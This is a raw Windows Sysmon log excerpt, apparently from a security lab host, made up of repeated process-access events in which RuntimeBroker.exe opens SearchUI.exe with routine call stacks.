13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
